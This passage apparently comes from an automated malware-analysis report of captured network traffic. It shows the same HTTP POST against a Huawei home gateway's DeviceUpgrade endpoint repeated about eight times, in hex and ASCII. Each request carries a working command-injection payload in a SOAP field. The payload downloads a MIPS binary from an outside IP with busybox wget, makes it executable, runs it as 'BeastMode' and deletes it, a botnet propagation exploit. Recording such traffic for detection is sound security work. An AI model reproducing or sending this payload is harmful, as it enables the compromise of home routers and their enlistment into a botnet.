HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
